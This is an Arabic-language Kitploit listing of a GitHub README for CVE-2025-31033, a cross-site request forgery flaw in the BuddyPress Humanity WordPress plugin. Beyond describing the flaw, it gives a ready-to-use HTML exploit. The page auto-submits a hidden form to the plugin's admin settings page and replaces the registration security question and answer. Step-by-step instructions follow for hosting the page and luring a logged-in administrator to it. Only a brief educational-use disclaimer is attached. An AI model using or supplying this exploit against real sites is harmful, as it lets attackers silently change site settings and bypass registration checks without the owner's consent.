Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-31033 — إضافة BuddyPress Humanity لـ WordPress <= 1.2 معرضة لثغرة تزوير الطلبات عبر المواقع (CSRF) | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-31033
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHubnxploited/cve-2025-31033

CVE-2025-31033

إضافة BuddyPress Humanity لـ WordPress <= 1.2 معرضة لثغرة تزوير الطلبات عبر المواقع (CSRF)

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

⚠️ CVE-2025-31033 - ثغرة CSRF في إضافة Buddypress Humanity لووردبريس <= 1.2

🛡️ ملخص الثغرة

إضافة Buddypress Humanity لووردبريس (الإصدار <= 1.2) معرّضة لثغرة تزوير الطلبات عبر المواقع (CSRF).
تسمح هذه الثغرة للمهاجم بإجبار مستخدم بصلاحيات أعلى (مثل المدير) على تعديل إعدادات الإضافة دون علمه (مثل سؤال وجواب الأمان)، متجاوزًا بذلك منطق التحقق من المستخدم.


🐞 نوع الثغرة

  • Cross Site Request Forgery (CSRF) - تزوير الطلبات عبر المواقع
  • المكوّن المتأثر: صفحة bph-settings (للمدير فقط)
  • CVE: CVE-2025-31033
  • المخاطر: CVSS 9.8

🚨 الأثر

عند استغلال هذه الثغرة بنجاح، يمكن للمهاجمين:

  • تغيير سؤال الأمان وإجابته المستخدمَين أثناء تسجيل المستخدمين
  • تجاوز التحقق البشري (humanity verification) بمعرفة الإجابة الجديدة
  • أتمتة تسجيل المستخدمين (ربما بالاقتران مع تصعيد الصلاحيات)
  • إساءة استغلال حمايات نموذج التسجيل دون تفاعل المستخدم

🎯 الإضافة المتأثرة

  • الاسم: Buddypress Humanity
  • الإصدار: ≤ 1.2
  • المعرّف: buddypress-humanity
  • تم الاختبار على: WordPress 6.x مع تفعيل BuddyPress

💥 إثبات المفهوم (استغلال HTML)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
  <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
    <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
    <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
    <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
    <input type="hidden" name="bph_submit" value="1">
  </form>
</body>
</html>

☠️ بمجرد فتح هذه الصفحة بواسطة مدير مُصادق، تقوم بتعديل إعدادات الإضافة بصمت.


🔧 كيفية الاستغلال

  1. استضف ملف HTML الخاص بإثبات المفهوم على أي خادم خارجي.
  2. اخدع مدير ووردبريس مسجّل الدخول لزيارة الصفحة.
  3. عند الزيارة، سيقوم متصفحه بإرسال النموذج بصمت.
  4. سيتم تحديث سؤال وإجابة الأمان الخاصة بالإضافة.
  5. يمكن للمهاجم الآن التسجيل باستخدام الإجابة المعروفة.

🧪 النتائج المترتبة على الاستغلال الناجح:

  • السؤال المعدّل: I’m Nxploited | Khaled Alenazi
  • الإجابة المعدّلة: Nxploit
  • أي مستخدم يُدخل "Nxploit" سيتجاوز التحقق.

⚠️ إخلاء مسؤولية

إثبات المفهوم هذا لأغراض تعليمية فقط.
استخدمه بمسؤولية ولا تختبره على أنظمة لا تملكها.
المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار ناتجة.


👤 بواسطة

Nxploited | Khaled Alenazi

تنزيل الأداة